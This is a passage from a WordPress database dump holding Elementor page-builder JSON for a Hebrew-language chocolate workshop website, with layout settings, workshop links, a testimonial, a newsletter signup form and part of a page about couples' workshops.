background\":\"classic\",\"background_overlay_color\":\"#190606\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.75},\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"115\",\"bottom\":\"50\",\"left\":\"115\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"74663cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"125f3fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05de\\u05d4 \\u05d4\\u05e9\\u05d1\\u05e2\\u05d9\\u05dd \\u05d4\\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e9\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd\",\"align\":\"center\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":53},\"typography_font_weight\":\"400\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"43\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"40\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6410b809\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"caption\":\"\\u05e0\\u05ea\\u05d9 \\u05d5\\u05d2\\u05d1\\u05e8\\u05d9\\u05d0\\u05dc\\u05d4 \\u05de\\u05e8\\u05d0\\u05e9\\u05d5\\u05df \\u05dc\\u05e6\\u05d9\\u05d5\\u05df\",\"text_color\":\"#cccccc\",\"caption_typography_typography\":\"custom\",\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":13},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c4e5757\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\\"\\u05ea\\u05de\\u05d9\\u05d3 \\u05d0\\u05d4\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d0\\u05e3 \\u05e4\\u05e2\\u05dd \\u05dc\\u05d0 \\u05d7\\u05e9\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d0\\u05e0\\u05d9 \\u05d0\\u05ea\\u05e8\\u05d2\\u05e9 \\u05db\\u05dc \\u05db\\u05da \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05dc\\u05dd \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7. \\u05ea\\u05d5\\u05d3\\u05d4 \\u05e8\\u05d1\\u05d4 \\u05dc\\u05e6\\u05d5\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3 \\u05e9\\u05e2\\u05d6\\u05e8 \\u05dc\\u05d9 \\u05dc\\u05de\\u05e6\\u05d5\\u05d0 \\u05d0\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea!\\\"\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":27},\"typography_font_weight\":\"400\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"17\",\"bottom\":\"0\",\"left\":\"17\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"25\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"25\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"typography_font_style\":\"italic\",\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c25e365\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26},\"typography_font_weight\":\"normal\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_text_color\":\"#40272c\",\"background_color\":\"#edd0a8\",\"border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"50\",\"bottom\":\"20\",\"left\":\"50\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"15\"},\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#5c0011\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A6%D7%A8%D7%95-%D7%A7%D7%A9%D7%A8\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"43f8ef8f\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"39181ab4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"10694622\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5212b57b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2b9dc682\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"50c468d5\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"3003b83\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"45bcecca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"37f8a4fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"285e10d7\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"24484b98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"33814887\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"48098d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f32a997\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"\\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4?\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(657,145,'_elementor_version','0.4'),(659,146,'_wp_page_template','elementor_canvas'),(660,146,'_elementor_edit_mode','builder'),(661,146,'_elementor_data','[{\"id\":\"700950a2\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"20a86e96\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"62b3fe8e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2f67ac3a\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"1abed8db\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"5569e669\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"19fc9855\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"6ce1bfb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23397fa3\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fcac0b5\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"25a68cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"c0d3ce2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"size\":\"xl\",\"header_size\":\"h1\",\"align\":\"right\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb2ce26\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/couple-chocho.jpg\",\"id\":76},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b16306\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><b>\\u05d0\\u05ea\\u05dd \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e7\\u05e1\\u05d5\\u05dd \\u05e9\\u05dc \\u05d6\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea? \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd \\u05e9\\u05d4\\u05d0\\u05e4\\u05e8\\u05d5\\u05d3\\u05d9\\u05d6\\u05d9\\u05d0\\u05e7 \\u05d4\\u05d0\\u05de\\u05d9\\u05ea\\u05d9 \\u05d4\\u05d5\\u05d0 \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d5\\u05d1\\u05db\\u05dc\\u05dc, \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05e9\\u05de\\u05e2\\u05d5\\u05e8\\u05e8\\u05d9\\u05dd \\u05ea\\u05d9\\u05d0\\u05d1\\u05d5\\u05df \\u05d2\\u05dd \\u05dc\\u05d1\\u05e0\\u05d9\\/\\u05d1\\u05e0\\u05d5\\u05ea \\u05d4\\u05d6\\u05d5\\u05d2.\\u00a0<\\/b><\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05d6\\u05d4 \\u05d1\\u05e2\\u05e6\\u05dd \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05d7\\u05d5\\u05d5\\u05ea \\u05d0\\u05ea \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05e4\\u05e0\\u05d9 \\u05e9\\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d5\\u05de\\u05d7\\u05d1\\u05e7\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3, \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d1\\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05dc\\u05e2\\u05e8\\u05d1\\u05d1, \\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8, \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05db\\u05dc \\u05e8\\u05d5\\u05d1\\u05d3 \\u05db\\u05d6\\u05d4 \\u05d0\\u05d5 \\u05d0\\u05d7\\u05e8 \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05dc\\u05d0\\u05d7\\u05e8 \\u05de\\u05db\\u05df, \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05d0\\u05d5\\u05ea\\u05d5. \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea 